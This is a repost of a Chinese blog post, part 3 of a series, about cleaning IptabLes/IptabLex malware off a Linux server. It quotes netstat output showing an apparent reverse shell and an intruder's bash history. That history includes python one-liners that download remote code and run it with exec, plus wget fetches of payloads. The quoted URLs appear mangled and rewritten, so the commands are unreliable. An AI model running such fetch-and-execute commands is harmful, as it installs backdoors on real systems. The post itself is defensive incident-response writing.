小记IptabLes和IptabLex病毒清理过程(3)
来源:互联网
时间:2026-02-26 16:38:46
作者:
系统大全为您提供
通过netstat -anput 发现这个进程的功能应该是 TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)。
tcp 0 1 这里是我的IP:41939 222.34.129.154:2804 SYN_SENT 1701/bash
这尼玛好像就是反弹shell吧。
还是看看.bash_history吧。
973 find -name '*tomcat*'
974 find -name 'index.jsp'
975 ------------------------------
976 find -name 'index.jsp'
977 ls
978 top
979 ls
980 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569489.read())" -m 50br 981 python2
982 python
983 ls
984 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569490.bz2br 985 wget www.baidu.com
986 cat index.html
987 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569490.bz2br 988 wget https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569491.bz2 --no-check-certificatebr 989 ls
990 tar -jxvf Python-2.7.tar.bz2
991 cd p
992 cd Python-2.7/
993 dir
994 ./configure
995 make
996 make install
997 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569489.read())" -m 50br 998 python -c "exec(__import__('urllib').urlopen('https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569492.read())" -m 50br 999 pip
1000 yum install python-zlib
他先安装了python,然后去那个URL下了个脚本,网站看了下,是个hack网站,那就是提权和做后门了吧。想再看看还有什么的时候发现只能保存1000行!!!!!
tail –100 ar/logcure
看看安全信息,有公网IP拼命的在尝试root的密码,而且走的是ssh进来的。当然关闭ssh相信应该是可以的。我这因为目前公网上还需要用到ssh,所以只能在hosts.deny上进行阻止该公网IP进来。
东北大学网络中心有常见的ssh攻击的IP地址,及一个sh脚本:
网址:https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569493.phpbr 阻止别人的ssh连接了,但是内部的 那个进程还是一直有,一直发着这个
TCP 这里是我的IP:59978->66.102.253.30:dvr-esm (SYN_SENT)
他应该用的应该是Struts2的漏洞进入服务器里的,但是留下的那个后门,我现在还没有办法解决,
Struts2的漏洞可以看这里:
https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569494.htmlbr 至此,先到这里吧。最近还是再看看吧。
以上就是系统大全给大家介绍的如何使的方法都有一定的了解了吧,好了,如果大家还想了解更多的资讯,那就赶紧点击系统大全官网吧。
本文来自系统大全https://www.herecours.com/d/file/efpub/2026/26-26/20260226160944569495
编辑推荐:
- 小记IptabLes和IptabLex病毒清理过程(3)02-26
- linux防火墙设置02-26
- Nginx设置目录保护、防盗链、限速、多域名的方法02-26
- Linux下自动备份文件到远程FTP服务器并删除指定日02-26
- linux学习之进程,线程和程序02-26
- linux中exit()和_exit区别02-26
- Linux系统之间拷贝文件的技巧总结02-26
- linux命令行学习-dig(DNS查询器)02-26
下一篇:
相关推荐
-
雷神推出 MIX PRO II 迷你主机:基于 Ultra 200H,玻璃上盖 + ARGB 灯效
2 月 9 日消息,雷神 (THUNDEROBOT) 现已宣布推出基于英
-
制造商 Musnap 推出彩色墨水屏电纸书 Ocean C:支持手写笔、第三方安卓应用
2 月 10 日消息,制造商 Musnap 现已在海外推出一款 Oce
热文推荐
- linux编译内核及添加系统调用(1)
linux编译内核及添加系统调用(1)
26-02-26 - 390W → 555W:网友极限改造未发布的英伟达 20GB RTX 3080 Ti 显卡
- 再有参与者退场:BUFFALO 巴法络计划于 2026 年 7 月停止销售蓝光播放器
- 博主反馈其华擎 X870 主板连毁两颗 AMD 9950X 处理器
博主反馈其华擎 X870 主板连毁两颗 AMD 9950X 处理器
26-02-26 - LG 推出“27G610A”27 英寸显示器:2K 200Hz,1199 元
- TrendForce:涨价效应带动 DRAM 内存产业 2025Q4 营收环比增长 29.4%
- 京东国际 × 亚马逊全球购:西部数据元素 12T 外置硬盘 1502 元 +24 期免息
- 达尔优推出 TMR 磁轴三模键盘 GT87,配备一体式锻碳手托
达尔优推出 TMR 磁轴三模键盘 GT87,配备一体式锻碳手托
26-02-26 - “拯救金鱼记忆”:微信员工谈微信新能力,可查看文件在多少个聊天中被使用
“拯救金鱼记忆”:微信员工谈微信新能力,可查看文件在多少个聊天中被使用
26-02-26 - linux下创建带密码的用户
linux下创建带密码的用户
26-02-26
